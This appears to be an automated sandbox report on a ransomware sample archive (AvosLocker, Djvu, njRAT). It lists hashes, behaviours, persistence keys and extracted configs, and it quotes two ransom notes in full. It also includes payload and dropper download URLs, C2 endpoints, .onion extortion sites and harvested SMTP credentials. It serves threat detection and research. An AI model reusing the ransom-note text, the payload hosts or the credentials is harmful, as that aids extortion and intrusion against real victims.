avoslocker | 4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23

Resubmissions

10-09-2024 18:03

240910-wnbk6axblq 10

10-09-2024 17:52

240910-wf31faxgqb 10

Analysis

max time kernel
75s
max time network
363s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00486.7z
Size

117.8MB
MD5

9cad20cac5e7a2828d978175bb888a8d
SHA1

d7253644d5b0c999adef488892b0b34115576d53
SHA256

4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
SHA512

271023ad2f017c2a89e81ebe67725ad3ef5e4114bd0249505fa1fff6ca102a314b93ef3ac7463f816b187b1cc11f521465138dbfcff8a08d32e1ce3ac0855b87
SSDEEP

3145728:4AORmmLuCgOX0cXsvmpqt8t2ed+Uv81oz+tHTQY:lmym0HvmZdZZszQY

Score

10^/10

avoslocker djvu njrat hacked lime discovery evasion execution persistence ransomware trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/880265796767608892/881902176195186728/New_Text_Document.txt

Extracted

Credentials

Protocol: smtp
Host:
smtp.yandex.com.tr
Port:
587
Username:
[email protected]
Password:
010203040506

Extracted

Path

F:\GET_YOUR_FILES_BACK.txt

Ransom Note

AvosLocker Attention! Your systems have been encrypted, and your confidential documents were downloaded. In order to restore your data, you must pay for the decryption key & application. You may do so by visiting us at http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion. This is an onion address that you may access using Tor Browser which you may download at https://www.torproject.org/download/ Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website. Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly. The corporations whom don't pay or fail to respond in a swift manner have their data leaked in our blog, accessible at http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion Additional notes from attackers responsible: Hello, All your data in the company is encrypted and your important company data is backed up. I do not need money, I receive payments from many companies every day and I deal with the encryption of many companies every day. More important than money is time for me. For this reason, I have time to inflate the number and bargain like other friends who do this business. The offer I have made for your company is very reasonable and not a big deal for you. If you do not pay, the data of the company that we have backed up after 7 days will be shared publicly on the internet and you will not be able to recover any of your encrypted data. Your ID: 8c7a9b681dfa1b2b87ea459caddf2adf9413dc76664fb74063fb264116897023

URLs

http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion

http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion

Extracted

Family

djvu

http://rlrz.org/fhsgtsspen6/get.php

Attributes

extension
.maql
offline_id
xcdIdDNFh62dy3iJsba1COhcfDENsbjPHQQ2Eht1
payload_url
http://znpst.top/dl/build2.exe

http://rlrz.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-pk3SGFlmek Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0340gSd743d

rsa_pubkey.plain

Extracted

Family

njrat

Version

0.7.3

Botnet

Lime

127.0.0.1:1528

Mutex

Client.exe

Attributes

reg_key
Client.exe
splitter
AZERTY

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

[email protected]:1177

Mutex

6987755f146a62fa584d2a8a43dc9fe3

Attributes

reg_key
6987755f146a62fa584d2a8a43dc9fe3
splitter
|'|'|

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker

Detected Djvu ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/7864-2063-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/7864-2064-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Renames multiple (141) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8028	netsh.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 27 IoCs

pid	Process
1968	HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
732	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
2416	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
3648	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
1800	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
1396	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
3976	zbhnd.exe
4488	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
1440	Setup.exe
4144	smss.exe
3300	Google123.exe
1868	HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
2264	Setup.tmp
5968	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
6028	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
6096	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
2224	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
5144	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
5716	HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
5556	HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
5800	HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
5808	HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
5816	HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
4984	HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
3360	HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
872	important files.exe
7260	HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe

Loads dropped DLL 5 IoCs

pid	Process
2264	Setup.tmp
2264	Setup.tmp
2264	Setup.tmp
2264	Setup.tmp
2264	Setup.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2984	icacls.exe

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023403-22.dat	upx
behavioral1/files/0x00070000000234de-458.dat	upx
behavioral1/memory/5968-937-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/files/0x0007000000023402-939.dat	upx
behavioral1/files/0x0007000000023401-933.dat	upx
behavioral1/files/0x0007000000023404-947.dat	upx
behavioral1/files/0x0013000000022936-952.dat	upx
behavioral1/files/0x000300000000070b-954.dat	upx
behavioral1/files/0x000300000000072b-959.dat	upx
behavioral1/files/0x00020000000229c0-974.dat	upx
behavioral1/files/0x0003000000000735-978.dat	upx
behavioral1/files/0x000300000000070b-988.dat	upx
behavioral1/files/0x00020000000229c1-985.dat	upx
behavioral1/memory/4984-1013-0x0000000000300000-0x00000000007FA000-memory.dmp	upx
behavioral1/memory/4984-1496-0x0000000000300000-0x00000000007FA000-memory.dmp	upx
behavioral1/memory/5968-1613-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/6028-1644-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/6096-1679-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/2224-1838-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/4984-2013-0x0000000000300000-0x00000000007FA000-memory.dmp	upx
behavioral1/memory/4984-2081-0x0000000000300000-0x00000000007FA000-memory.dmp	upx
behavioral1/memory/4984-6553-0x0000000000300000-0x00000000007FA000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\""	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe"	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\""	Google123.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sffnzaz6da = "C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe"	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
89	iplogger.org
92	iplogger.org
80	iplogger.org
84	iplogger.org

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
292	checkip.dyndns.org
44	checkip.dyndns.org
63	api.2ip.ua
65	api.2ip.ua
68	api.ipify.org
69	api.ipify.org
90	ip-api.com
126	api.2ip.ua

Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Proxy
T1090

Drops file in Program Files directory 59 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\7z.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7zG.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7-zip.dll.exe.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File created	C:\Program Files\7-Zip\7z.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7zCon.sfx.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File created	C:\Program Files\7-Zip\7-zip.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File created	C:\Program Files\7-Zip\Lang\an.txt.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\Lang\af.txt.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\Lang\ast.txt.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7-zip.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File created	C:\Program Files\7-Zip\7-zip.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7z.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7z.sfx.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
File created	C:\Program Files\7-Zip\7-zip.chm.exe.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File created	C:\Program Files\7-Zip\7-zip32.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7zFM.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
File created	C:\Program Files\7-Zip\7-zip.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File created	C:\Program Files\7-Zip\7-zip.chm.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
File created	C:\Program Files\7-Zip\Lang\ar.txt.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\History.txt.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File created	C:\Program Files\7-Zip\7-zip.chm.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File created	C:\Program Files\7-Zip\7-zip.dll.exe.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
7344	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
4240	1968	WerFault.exe	108
5024	1968	WerFault.exe	108
6916	6424	WerFault.exe	203
7172	5764	WerFault.exe	212
5424	7724	WerFault.exe	207

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zbhnd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmiintegrator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	important files.exe
